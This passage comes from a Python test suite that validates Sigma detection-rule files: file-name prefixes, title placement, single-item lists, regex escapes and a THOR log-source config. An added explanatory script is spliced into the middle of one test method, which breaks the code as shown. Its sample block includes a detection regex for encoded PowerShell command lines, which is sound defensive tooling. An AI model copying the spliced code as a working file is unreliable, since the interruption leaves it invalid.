\"modsec_\"\n                                elif value == \"diagnosis-scripted\":\n                                    pattern_prefix = \"win_diagnosis_scripted_\"\n                                elif value == \"firewall-as\":\n                                    pattern_prefix = \"win_firewall_as_\"\n                                elif value == \"msexchange-management\":\n                                    pattern_prefix = \"win_exchange_\"\n                                elif value == \"security\":\n                                    pattern_prefix = \"win_security_\"\n                                elif value == \"system\":\n                                    pattern_prefix = \"win_system_\"\n                                elif value == \"taskscheduler\":\n                                    pattern_prefix = \"win_taskscheduler_\"\n                                elif value == \"terminalservices-localsessionmanager\":\n                                    pattern_prefix = \"win_terminalservices_\"\n                                elif value == \"windefend\":\n                                    pattern_prefix = \"win_defender_\"\n                                elif value == \"wmi\":\n                                    pattern_prefix = \"win_wmi_\"\n                                elif value == \"codeintegrity-operational\":\n                                    pattern_prefix = \"win_codeintegrity_\"\n                                elif value == \"bits-client\":\n                                    pattern_prefix = \"win_bits_client_\"\n                                elif value == \"applocker\":\n                                    pattern_prefix = \"win_applocker_\"\n                                elif value == \"dns-server-analytic\":\n                                    pattern_prefix = \"win_dns_analytic_\"\n                                elif value == \"bitlocker\":\n                                    pattern_prefix = \"win_bitlocker_\"\n      
                          elif value == \"capi2\":\n                                    pattern_prefix = \"win_capi2_\"\n                                elif (\n                                    value\n                                    == \"certificateservicesclient-lifecycle-system\"\n                                ):\n                                    pattern_prefix = \"win_certificateservicesclient_lifecycle_system_\"\n                                elif value == \"pim\":\n                                    pattern_prefix = \"azure_pim_\"\n\n                    # This value is used to test if we should add the OS infix for certain categories\n                    if os_bool:\n                        pattern_prefix += os_infix\n                    if pattern_prefix != \"\":\n                        if not filename.startswith(pattern_prefix):\n                            for key, value in logsource.items():\n                                if key in [\"category\", \"service\", \"product\"]:\n                                    print(\n                                        Fore.YELLOW\n                                        + \"Rule {} has inconsistency between filename '{}' and logsource ({}: '{}'):\".format(\n                                            file, filename, key, value\n                                        )\n                                    )\n                            if file not in faulty_rules:\n                                faulty_rules.append(file)\n            name_lst.append(filename)\n\n        self.assertEqual(\n            faulty_rules,\n            [],\n            Fore.RED\n            + r\"There are rules with malformed file names (too short, too long, uppercase letters, a minus sign etc.). Please see the file names used in our repository and adjust your file names accordingly. The pattern for a valid file name is \\'[a-z0-9_]{10,90}\\.yml\\' and it has to contain at least an underline character. 
It also has to follow the following naming convention https://github.com/SigmaHQ/sigma-specification/blob/main/specification/sigma-rules-specification.md#yaml-file\",\n        )\n\n    # sigma cli sigmahq_title_caseIssue, sigmahq_title_endIssue, sigmahq_title_lengthIssue, sigmahq_title_startIssue\n    # def test_title(self):\n    #     faulty_rules = []\n    #     allowed_lowercase_words = [\n    #         \"the\",\n    #         \"for\",\n    #         \"in\",\n    #         \"with\",\n    #         \"via\",\n    #         \"on\",\n    #         \"to\",\n    #         \"without\",\n    #         \"of\",\n    #         \"through\",\n    #         \"from\",\n    #         \"by\",\n    #         \"as\",\n    #         \"a\",\n    #         \"or\",\n    #         \"at\",\n    #         \"and\",\n    #         \"an\",\n    #         \"over\",\n    #         \"new\",\n    #     ]\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         title = self.get_rule_part(file_path=file, part_name=\"title\")\n    #         if not title:\n    #             print(Fore.RED + \"Rule {} has no field 'title'.\".format(file))\n    #             faulty_rules.append(file)\n    #             continue\n    #         elif len(title) > 110:\n    #             print(\n    #                 Fore.YELLOW\n    #                 + \"Rule {} has a title field with too many characters (>110)\".format(\n    #                     file\n    #                 )\n    #             )\n    #             faulty_rules.append(file)\n    #         if title.startswith(\"Detects \"):\n    #             print(\n    #                 Fore.RED\n    #                 + \"Rule {} has a title that starts with 'Detects'\".format(file)\n    #             )\n    #             faulty_rules.append(file)\n    #         if title.endswith(\".\"):\n    #             print(Fore.RED + \"Rule {} has a title that ends with '.'\".format(file))\n    #             faulty_rules.append(file)\n    #       
  wrong_casing = []\n    #         for word in title.split(\" \"):\n    #             if (\n    #                 word.islower()\n    #                 and not word.lower() in allowed_lowercase_words\n    #                 and not \".\" in word\n    #                 and not \"/\" in word\n    #                 and not \"_\" in word\n    #                 and not word[0].isdigit()\n    #             ):\n    #                 wrong_casing.append(word)\n    #         if len(wrong_casing) > 0:\n    #             print(\n    #                 Fore.RED\n    #                 + \"Rule {} has a title without title capitalization. Words: '{}'\".format(\n    #                     file, \", \".join(wrong_casing)\n    #                 )\n    #             )\n    #             faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with non-conforming 'title' fields. Please check: https://github.com/SigmaHQ/sigma/wiki/Rule-Creation-Guide#title\",\n    #     )\n\n    def test_title_in_first_line(self):\n        faulty_rules = []\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            yaml = self.get_rule_yaml(file)\n\n            # skip multi-part yaml\n            if len(yaml) > 1:\n                continue\n\n            # this probably is not the best way to check whether\n            # title is the attribute given in the 1st line\n            # (also assumes dict keeps the order from the input file)\n            if list(yaml[0].keys())[0] != \"title\":\n                print(\n                    Fore.RED\n                    + \"Rule {} does not have its 'title' attribute in the first line\".format(\n                        file\n                    )\n                )\n                faulty_rules.append(file)\n\n        self.assertEqual(\n            faulty_rules,\n            [],\n            Fore.RED\n            + \"There are 
rules without the 'title' attribute in their first line.\",\n        )\n\n    def test_selection_list_one_value(self):\n        def treat_list(file, values, valid_, selection_name):\n            # rule with only list of Keywords term\n            if len(values) == 1 and not isinstance(values[0], str):\n                print(\n                    Fore.RED\n                    + \"Rule {} has the selection ({}) with a list of only 1 element in detection\".format(\n                        file, selection_name\n                    )\n                )\n                valid_ = False\n            elif isinstance(values[0], dict):\n                valid_ = treat_dict(file, values, valid_, selection_name)\n            return valid_\n\n        def treat_dict(file, values, valid_, selection_name):\n            if isinstance(values, list):\n                for dict_ in values:\n                    for key_ in dict_.keys():\n                        if isinstance(dict_[key_], list):\n                            if len(dict_[key_]) == 1:\n                                print(\n                                    Fore.RED\n                                    + \"Rule {} has the selection ({}/{}) with a list of only 1 value in detection\".format(\n                                        file, selection_name, key_\n                                    )\n                                )\n                                valid_ = False\n            else:\n                dict_ = values\n                for key_ in dict_.keys():\n                    if isinstance(dict_[key_], list):\n                        if len(dict_[key_]) == 1:\n                            print(\n                                Fore.RED\n                                + \"Rule {} has the selection ({}/{}) with a list of only 1 value in detection\".format(\n                                    file, selection_name, key_\n                                )\n                            )\n                          
  valid_ = False\n            return valid_\n\n        faulty_rules = []\n        for file in self.yield_next_rule_file_path(self.path_to_rules):\n            detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n            if detection:\n                valid = True\n                for key in detection:\n                    values = detection[key]\n                    if isinstance(detection[key], list):\n                        valid = treat_list(file, values, valid, key)\n\n                    if isinstance(detection[key], dict):\n                        valid = treat_dict(file, values, valid, key)\n\n                    # record each faulty file only once, even if several selections fail\n                    if not valid and file not in faulty_rules:\n                        faulty_rules.append(file)\n\n        self.assertEqual(\n            faulty_rules,\n            [],\n            Fore.RED + \"There are rules using a list with only 1 element\",\n        )\n\n    # sigma cli SigmahqSigmacIssue\n    # def test_selection_start_or_and(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n    #         if detection:\n    #             # This test is a best effort to avoid breaking the SIGMAC parser. 
You could do more testing and try to fix this once and for all by modifying the token regular expressions https://github.com/SigmaHQ/sigma/blob/b9ae5303f12cda8eb6b5b90a32fd7f11ad65645d/tools/sigma/parser/condition.py#L107-L127\n    #             for key in detection:\n    #                 if key[:3].lower() == \"sel\":\n    #                     continue\n    #                 elif key[:2].lower() == \"or\":\n    #                     print(\n    #                         Fore.RED\n    #                         + \"Rule {} has a selection '{}' that starts with the string 'or'\".format(\n    #                             file, key\n    #                         )\n    #                     )\n    #                     faulty_rules.append(file)\n    #                 elif key[:3].lower() == \"and\":\n    #                     print(\n    #                         Fore.RED\n    #                         + \"Rule {} has a selection '{}' that starts with the string 'and'\".format(\n    #                             file, key\n    #                         )\n    #                     )\n    #                     faulty_rules.append(file)\n    #                 elif key[:3].lower() == \"not\":\n    #                     print(\n    #                         Fore.RED\n    #                         + \"Rule {} has a selection '{}' that starts with the string 'not'\".format(\n    #                             file, key\n    #                         )\n    #                     )\n    #                     faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with bad selection names. 
Can't start a selection name with an 'or*' or an 'and*' or a 'not*' \",\n    #     )\n\n    # sigma validator dangling_detection\n    # def test_unused_selection(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n    #         condition = detection[\"condition\"]\n    #         wildcard_selections = re.compile(r\"\\sof\\s([\\w\\*]+)(?:$|\\s|\\))\")\n\n    #         # skip rules containing aggregations\n    #         if type(condition) == list:\n    #             continue\n\n    #         for selection in detection:\n    #             if selection == \"condition\":\n    #                 continue\n    #             if selection == \"timeframe\":\n    #                 continue\n\n    #             # remove special keywords\n    #             condition_list = (\n    #                 condition.replace(\"not \", \"\")\n    #                 .replace(\"1 of \", \"\")\n    #                 .replace(\"all of \", \"\")\n    #                 .replace(\" or \", \" \")\n    #                 .replace(\" and \", \" \")\n    #                 .replace(\"(\", \"\")\n    #                 .replace(\")\", \"\")\n    #                 .split(\" \")\n    #             )\n    #             if selection in condition_list:\n    #                 continue\n\n    #             # find all wildcards in condition\n    #             found = False\n    #             for wildcard_selection in wildcard_selections.findall(condition):\n    #                 # wildcard matches selection\n    #                 if (\n    #                     re.search(wildcard_selection.replace(r\"*\", r\".*\"), selection)\n    #                     is not None\n    #                 ):\n    #                     found = True\n    #                     break\n    #             # selection was not found in condition\n    #             if not found:\n    #              
   print(\n    #                     Fore.RED\n    #                     + \"Rule {} has an unused selection '{}'\".format(file, selection)\n    #                 )\n    #                 faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules, [], Fore.RED + \"There are rules with unused selections\"\n    #     )\n\n    # sigma cli SigmahqInvalidAllModifierIssue\n    # def test_all_value_modifier_single_item(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n    #         if detection:\n    #             for search_identifier in detection:\n    #                 if isinstance(detection[search_identifier], dict):\n    #                     for field in detection[search_identifier]:\n    #                         if \"|all\" in field and not isinstance(\n    #                             detection[search_identifier][field], list\n    #                         ):\n    #                             print(\n    #                                 Fore.RED\n    #                                 + \"Rule {} uses the 'all' modifier on a single item in selection ({}/{})\".format(\n    #                                     file, search_identifier, field\n    #                                 )\n    #                             )\n    #                             faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with |all modifier only having one item. \"\n    #         + \"Single item values are not allowed to have an all modifier as some back-ends cannot support it. 
\"\n    #         + \"If you use it as a workaround to duplicate a field in a selection, use a new selection instead.\",\n    #     )\n\n    # sigma cli SigmahqFieldUserIssue\n    # def test_field_user_localization(self):\n    #     def checkUser(faulty_rules, dict):\n    #         for key, value in dict.items():\n    #             if \"User\" in key:\n    #                 if type(value) == str:\n    #                     if \"AUTORI\" in value or \"AUTHORI\" in value:\n    #                         print(\"Localized user name '{}'.\".format(value))\n    #                         faulty_rules.append(file)\n\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n    #         for sel_key, sel_value in detection.items():\n    #             if sel_key == \"condition\" or sel_key == \"timeframe\":\n    #                 continue\n    #             # single item selection\n    #             if type(sel_value) == dict:\n    #                 checkUser(faulty_rules, sel_value)\n    #             if type(sel_value) == list:\n    #                 # skip keyword selection\n    #                 if type(sel_value[0]) != dict:\n    #                     continue\n    #                 # multiple item selection\n    #                 for item in sel_value:\n    #                     checkUser(faulty_rules, item)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules that match using localized user accounts. 
Better employ a generic version such as:\\n\"\n    #         + \"User|contains: # covers many language settings\\n\"\n    #         + \"    - 'AUTHORI'\\n\"\n    #         + \"    - 'AUTORI'\",\n    #     )\n\n    # sigma condition error\n    # def test_condition_operator_casesensitive(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n    #         if detection:\n    #             valid = True\n    #             if isinstance(detection[\"condition\"], str):\n    #                 for item in detection[\"condition\"].split(\" \"):\n    #                     # operators are keywords only in lowercase; 'OR', 'And' etc. are errors\n    #                     if item.lower() in (\"or\", \"and\", \"not\", \"of\") and item != item.lower():\n    #                         valid = False\n    #                 if not valid:\n    #                     print(\n    #                         Fore.RED\n    #                         + \"Rule {} has an invalid condition '{}': 'or', 'and', 'not' and 'of' must be lowercase\".format(\n    #                             file, detection[\"condition\"]\n    #                         )\n    #                     )\n    #                     faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED + \"There are rules whose condition uses an operator that is not lowercase\",\n    #     )\n\n    def test_broken_thor_logsource_config(self):\n        faulty_config = False\n\n        # This test checks whether the \"thor.yml\" config file has a missing \"WinEventLog:\" prefix in 
Windows log sources\n        path_to_thor_config = os.path.join(\n            os.path.dirname(os.path.realpath(__file__)), \"tests/thor.yml\"\n        )\n        try:\n            thor_logsources = self.get_rule_yaml(path_to_thor_config)[0][\"logsources\"]\n        except Exception:\n            # Only the config load is guarded: an assertion failure further down must\n            # not be swallowed and then reported as a missing file.\n            self.fail(\n                Fore.RED\n                + \"thor.yml configuration file was not found. Please make sure to run the script from the root of the sigma folder\"\n            )\n\n        for key, value in thor_logsources.items():\n            # Only Windows log sources carry the 'WinEventLog:' prefix; entries without\n            # a 'product' or 'sources' key are skipped explicitly instead of via a bare except.\n            if not isinstance(value, dict) or value.get(\"product\") != \"windows\":\n                continue\n            for source in value.get(\"sources\", []):\n                if not str(source).startswith(\"WinEventLog:\"):\n                    faulty_config = True\n                    print(\n                        Fore.RED\n                        + \"/tests/thor.yml config file has a broken source ({}: {}). Windows Eventlog sources must start with the keyword 'WinEventLog:'\".format(\n                            key, source\n                        )\n                    )\n\n        self.assertEqual(\n            faulty_config,\n            False,\n            Fore.RED\n            + \"thor.yml configuration file located in 'tests/thor.yml' has a broken log source definition\",\n        )\n\n    def test_re_invalid_escapes(self):\n        faulty_rules = []\n        MAX_DEPTH = 3\n\n        def create_escape_allow_list():\n            \"\"\"\n            Create a list of characters that are allowed to be escaped.\n            1. Based on string.punctuation chars that would already be escaped by re.escape()\n            2. Followed by special chars like '\\n', '\\t', '\\[0-9]' etc.\n            3. 
Followed by Double- or Single Quote to escape string literals.\n            \"\"\"\n            allowed_2_be_escaped = []\n            index = 0\n            l = tuple(re.escape(string.punctuation))\n            for c in l:\n                if c == \"\\\\\":\n                    allowed_2_be_escaped.append(l[index + 1])\n                index += 1\n\n            re_specials = [\n                \"A\",\n                \"b\",\n                \"B\",\n                \"d\",\n                \"D\",\n                \"f\",\n                \"n\",\n                \"r\",\n                \"s\",\n                \"S\",\n                \"t\",\n                \"v\",\n                \"w\",\n                \"W\",\n                \"Z\",\n                # Match Groups\n                \"0\",\n                \"1\",\n                \"2\",\n                \"3\",\n                \"4\",\n                \"5\",\n                \"6\",\n                \"7\",\n                \"8\",\n                \"9\",\n            ]\n            allowed_2_be_escaped.extend(re_specials)\n\n            allowed_2_be_escaped.extend(\n                [\n                    '\"',\n                    \"'\",\n                ]\n            )\n\n            return allowed_2_be_escaped\n\n        def check_list_or_recurse_on_dict(item, depth: int, special: bool) -> None:\n            \"\"\"\n            Recursive walk through the detection to find \"|re\" occurrences.\n            Jump to check_item_for_bad_escapes with lists or strings found.\n            \"\"\"\n            if type(item) == list:\n                # a plain keyword list carries no field names and therefore no |re modifier\n                pass\n            elif type(item) == dict and depth <= MAX_DEPTH:\n                for keys, sub_item in item.items():\n                    if (\n                        \"|re\" in keys\n                    ):  # matches the 're' modifier anywhere in the field's modifier chain\n                        if type(sub_item) == str or type(sub_item) 
== list:\n                            check_item_for_bad_escapes(sub_item)\n                        else:\n                            check_list_or_recurse_on_dict(sub_item, depth + 1, True)\n                    else:\n                        check_list_or_recurse_on_dict(sub_item, depth + 1, special)\n\n        def check_item_for_bad_escapes(item):\n            \"\"\"\n            Check item against bad escaped characters.\n            Escapes are consumed in pairs, so an escaped backslash never makes the\n            character after it look like a new escape, and a lone backslash at the\n            end of a value is reported instead of raising IndexError.\n            \"\"\"\n            found_bad_escapes = []\n            to_check = [item] if type(item) == str else item\n            for str_item in to_check:\n                l = tuple(str(str_item))\n                index = 0\n                while index < len(l):\n                    if l[index] != \"\\\\\":\n                        index += 1\n                        continue\n                    if index + 1 >= len(l):\n                        # a trailing backslash escapes nothing\n                        if \"<end of value>\" not in found_bad_escapes:\n                            found_bad_escapes.append(\"<end of value>\")\n                        break\n                    escaped = l[index + 1]\n                    # Check if character after \\ is not in escape_allow_list and also not already found\n                    if escaped not in escape_allow_list and escaped not in found_bad_escapes:\n                        found_bad_escapes.append(escaped)\n                    # skip the whole escape pair, so an escaped backslash followed by 'd' is not read as \\d\n                    index += 2\n\n            if len(found_bad_escapes) > 0:\n                print(\n                    Fore.RED\n                    + \"Rule {} has forbidden escapes in |re '{}'\".format(\n                        file, \",\".join(found_bad_escapes)\n                    )\n                )\n                faulty_rules.append(file)\n\n        # Create escape_allow_list for this test\n        escape_allow_list = create_escape_allow_list()\n\n        # For each rule file, extract detection and dive into recursion\n        
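The unused-selection scan in test_unused_selection and the escape scan in test_re_invalid_escapes both walk a rule's detection block: the first has to expand `1 of sel*` / `all of sel*` wildcards against the selection names, the second has to treat an escaped backslash as one unit and must not run past the end of the value. The following stand-alone script is an added example, not code from the Sigma repository or its test suite; it implements both checks over a constructed detection block (plain dicts instead of a parsed YAML file, so it runs offline). The selection names, field names and regex values in SAMPLE_DETECTION are made up for the example.

```python
import re
import string
from fnmatch import fnmatchcase
from typing import Dict, Iterator, List, Tuple

# Characters that may follow a backslash inside a Sigma "|re" value: the
# punctuation re.escape() itself escapes, the common regex class escapes,
# backreference digits, and the two quote characters.
RE_ALLOWED_ESCAPES = frozenset(
    c for c in string.punctuation if re.escape(c) != c
) | frozenset("AbBdDfnrsStvwWZ0123456789\"'")

# Condition tokens that are operators or quantifiers, never selection names.
CONDITION_KEYWORDS = {"and", "or", "not", "of", "1", "all", "(", ")"}
_TOKEN = re.compile(r"\(|\)|[^\s()]+")


def find_bad_re_escapes(pattern: str) -> List[str]:
    """Return each character that follows a backslash but is not allowed to.

    Escapes are consumed in pairs, so an escaped backslash never makes the
    character after it look like a new escape; a lone backslash at the end of
    the pattern is reported as "<EOL>" instead of raising IndexError.
    """
    bad: List[str] = []
    i = 0
    while i < len(pattern):
        if pattern[i] != "\\":
            i += 1
            continue
        if i + 1 >= len(pattern):
            bad.append("<EOL>")
            break
        nxt = pattern[i + 1]
        if nxt not in RE_ALLOWED_ESCAPES and nxt not in bad:
            bad.append(nxt)
        i += 2  # skip the whole escape pair
    return bad


def re_values(detection: dict) -> Iterator[Tuple[str, str]]:
    """Yield (field, value) for every field whose modifier chain contains 're'."""
    for name, body in detection.items():
        if name in ("condition", "timeframe"):
            continue
        for item in body if isinstance(body, list) else [body]:
            if not isinstance(item, dict):  # keyword list: no field modifiers
                continue
            for field, value in item.items():
                if "re" not in field.split("|")[1:]:
                    continue
                for v in value if isinstance(value, list) else [value]:
                    yield field, str(v)


def unused_selections(detection: dict) -> List[str]:
    """Selections the condition never references, directly or through a
    wildcard such as '1 of selection_*'; 'them' references every selection."""
    condition = detection.get("condition")
    if not isinstance(condition, str):  # list-valued (aggregation) conditions are skipped
        return []
    referenced = {t for t in _TOKEN.findall(condition) if t not in CONDITION_KEYWORDS}
    if "them" in referenced:
        return []
    names = [k for k in detection if k not in ("condition", "timeframe")]
    return [n for n in names if not any(fnmatchcase(n, pat) for pat in referenced)]


def check_detection(detection: dict) -> Dict[str, List[str]]:
    """Run both checks and return their findings keyed by check name."""
    bad_escapes = [
        "{}: \\{}".format(field, esc)
        for field, value in re_values(detection)
        for esc in find_bad_re_escapes(value)
    ]
    return {"unused_selections": unused_selections(detection), "bad_re_escapes": bad_escapes}


# Constructed detection block (not a rule from the repository): one selection is
# never referenced by the condition and one |re value ends in the bad escape "\q".
SAMPLE_DETECTION = {
    "selection_img": {"Image|endswith": "\\powershell.exe"},
    "selection_cli": {"CommandLine|re": r"-enc(odedcommand)?\s+[A-Za-z0-9+/=]{20,}\q"},
    "filter_parent": {"ParentImage": "C:\\Windows\\explorer.exe"},
    "filter_unused": {"User|contains": "AUTHORI"},
    "condition": "1 of selection_* and not filter_parent",
}

if __name__ == "__main__":
    for check, findings in check_detection(SAMPLE_DETECTION).items():
        print("{}: {}".format(check, findings or "ok"))
```

Running the script reports `filter_unused` as unreferenced and `CommandLine|re: \q` as a forbidden escape; the `|endswith` and plain-field values are never scanned because only fields carrying the `re` modifier hold regular expressions.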
for file in self.yield_next_rule_file_path(self.path_to_rules):\n            detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n            if detection:\n                check_list_or_recurse_on_dict(detection, 1, False)\n\n        self.assertEqual(\n            faulty_rules, [], Fore.RED + \"There are rules using illegal re-escapes\"\n        )\n\n    # def test_confirm_extension_is_yml(self):\n    #     files_with_incorrect_extensions = []\n\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         file_name_and_extension = os.path.splitext(file)\n    #         if len(file_name_and_extension) == 2:\n    #             extension = file_name_and_extension[1]\n    #             if extension != \".yml\":\n    #                 files_with_incorrect_extensions.append(file)\n\n    #     self.assertEqual(files_with_incorrect_extensions, [], Fore.RED +\n    #                      \"There are rule files with extensions other than .yml\")\n\n    # sigma-cli validators attacktag\n    # def test_confirm_correct_mitre_tags(self):\n    #     files_with_incorrect_mitre_tags = []\n\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         tags = self.get_rule_part(file_path=file, part_name=\"tags\")\n    #         if tags:\n    #             for tag in tags:\n    #                 if tag.startswith(\"attack.\") and tag not in self.MITRE_ALL:\n    #                     print(\n    #                         Fore.RED\n    #                         + \"Rule {} has the following incorrect MITRE tag {}\".format(\n    #                             file, tag\n    #                         )\n    #                     )\n    #                     files_with_incorrect_mitre_tags.append(file)\n\n    #     self.assertEqual(\n    #         files_with_incorrect_mitre_tags,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with incorrect/unknown MITRE Tags. 
(please inform us about new tags that are not yet supported in our tests) and check the correct tags here: https://attack.mitre.org/ \",\n    #     )\n\n    # sigma validators duplicate_tag\n    # def test_duplicate_tags(self):\n    #     files_with_incorrect_mitre_tags = []\n\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         tags = self.get_rule_part(file_path=file, part_name=\"tags\")\n    #         if tags:\n    #             known_tags = []\n    #             for tag in tags:\n    #                 if tag in known_tags:\n    #                     print(\n    #                         Fore.RED\n    #                         + \"Rule {} has the duplicate tag {}\".format(file, tag)\n    #                     )\n    #                     files_with_incorrect_mitre_tags.append(file)\n    #                 else:\n    #                     known_tags.append(tag)\n\n    #     self.assertEqual(\n    #         files_with_incorrect_mitre_tags,\n    #         [],\n    #         Fore.RED + \"There are rules with duplicate tags\",\n    #     )\n\n    #  sigma validators duplicate_references\n    # def test_duplicate_references(self):\n    #     files_with_duplicate_references = []\n\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         references = self.get_rule_part(file_path=file, part_name=\"references\")\n    #         if references:\n    #             known_references = []\n    #             for reference in references:\n    #                 if reference in known_references:\n    #                     print(\n    #                         Fore.RED\n    #                         + \"Rule {} has the duplicate reference {}\".format(\n    #                             file, reference\n    #                         )\n    #                     )\n    #                     files_with_duplicate_references.append(file)\n    #                 else:\n    #                     
known_references.append(reference)\n\n    #     self.assertEqual(\n    #         files_with_duplicate_references,\n    #         [],\n    #         Fore.RED + \"There are rules with duplicate references\",\n    #     )\n\n    # sigma validator identifier_existence identifier_uniqueness\n    # def test_missing_id(self):\n    #     faulty_rules = []\n    #     dict_id = {}\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         id = self.get_rule_part(file_path=file, part_name=\"id\")\n    #         if not id:\n    #             print(Fore.YELLOW + \"Rule {} has no field 'id'.\".format(file))\n    #             faulty_rules.append(file)\n    #         elif len(id) != 36:\n    #             print(\n    #                 Fore.YELLOW\n    #                 + \"Rule {} has a malformed 'id' (not 36 chars).\".format(file)\n    #             )\n    #             faulty_rules.append(file)\n    #         elif id.lower() in dict_id:\n    #             # ids are stored lowercased, so the lookup must use the same key\n    #             print(\n    #                 Fore.YELLOW\n    #                 + \"Rule {} has the same 'id' as {}. Ids have to be unique.\".format(\n    #                     file, dict_id[id.lower()]\n    #                 )\n    #             )\n    #             faulty_rules.append(file)\n    #         else:\n    #             dict_id[id.lower()] = file\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with missing or malformed 'id' fields. Generate an id (e.g. 
here: https://www.uuidgenerator.net/version4) and add it to the reported rule(s).\",\n    #     )\n    # sigma-cli error\n    # def test_optional_date_modified(self):\n    #     faulty_rules = []\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         modifiedfield = self.get_rule_part(file_path=file, part_name=\"modified\")\n    #         if modifiedfield:\n    #             if not isinstance(modifiedfield, str):\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a malformed 'modified' (should be YYYY/MM/DD).\".format(\n    #                         file\n    #                     )\n    #                 )\n    #                 faulty_rules.append(file)\n    #             elif len(modifiedfield) != 10:\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a malformed 'modified' (not 10 chars, should be YYYY/MM/DD).\".format(\n    #                         file\n    #                     )\n    #                 )\n    #                 faulty_rules.append(file)\n    #             elif modifiedfield[4] != \"/\" or modifiedfield[7] != \"/\":\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a malformed 'modified' (should be YYYY/MM/DD).\".format(\n    #                         file\n    #                     )\n    #                 )\n    #                 faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed 'modified' fields. (create one, e.g. 
modified: 2019/01/14)\",\n    #     )\n\n    # sigma-cli error and validator status_existence status_unsupported\n    # def test_optional_status(self):\n    #     faulty_rules = []\n    #     valid_status = [\"stable\", \"test\", \"experimental\", \"deprecated\", \"unsupported\"]\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         status_str = self.get_rule_part(file_path=file, part_name=\"status\")\n    #         if status_str:\n    #             if status_str not in valid_status:\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has an invalid 'status' (check wiki).\".format(file)\n    #                 )\n    #                 faulty_rules.append(file)\n    #             elif status_str == \"unsupported\":\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has the status 'unsupported' and cannot stay in the rules directory\".format(\n    #                         file\n    #                     )\n    #                 )\n    #                 faulty_rules.append(file)\n    #         else:\n    #             print(\n    #                 Fore.YELLOW + \"Rule {} is missing the 'status' field\".format(file)\n    #             )\n    #             faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed or missing 'status' fields. 
(check https://github.com/SigmaHQ/sigma-specification)\",\n    #     )\n\n    # Sigma validator all_of_them_condition\n    # def test_all_of_them_condition(self):\n    #     faulty_detections = []\n\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         detection = self.get_rule_part(file_path=file, part_name=\"detection\")\n\n    #         if \"all of them\" in detection[\"condition\"]:\n    #             faulty_detections.append(file)\n\n    #     self.assertEqual(\n    #         faulty_detections,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules using 'all of them'. Better use e.g. 'all of selection*' instead (and use the 'selection_' prefix as search-identifier).\",\n    #     )\n\n    # sigma-cli validators tlptag\n    # def test_optional_tlp(self):\n    #     faulty_rules = []\n    #     valid_tlp = [\n    #         \"WHITE\",\n    #         \"GREEN\",\n    #         \"AMBER\",\n    #         \"RED\",\n    #     ]\n    #     for file in self.yield_next_rule_file_path(self.path_to_rules):\n    #         tlp_str = self.get_rule_part(file_path=file, part_name=\"tlp\")\n    #         if tlp_str:\n    #             # it exists but isn't a string\n    #             if not isinstance(tlp_str, str):\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a 'tlp' field that isn't a string.\".format(file)\n    #                 )\n    #                 faulty_rules.append(file)\n    #             elif not tlp_str.upper() in valid_tlp:\n    #                 print(\n    #                     Fore.YELLOW\n    #                     + \"Rule {} has a 'tlp' field with not valid value.\".format(file)\n    #                 )\n    #                 faulty_rules.append(file)\n\n    #     self.assertEqual(\n    #         faulty_rules,\n    #         [],\n    #         Fore.RED\n    #         + \"There are rules with malformed optional 'tlp' fields. 
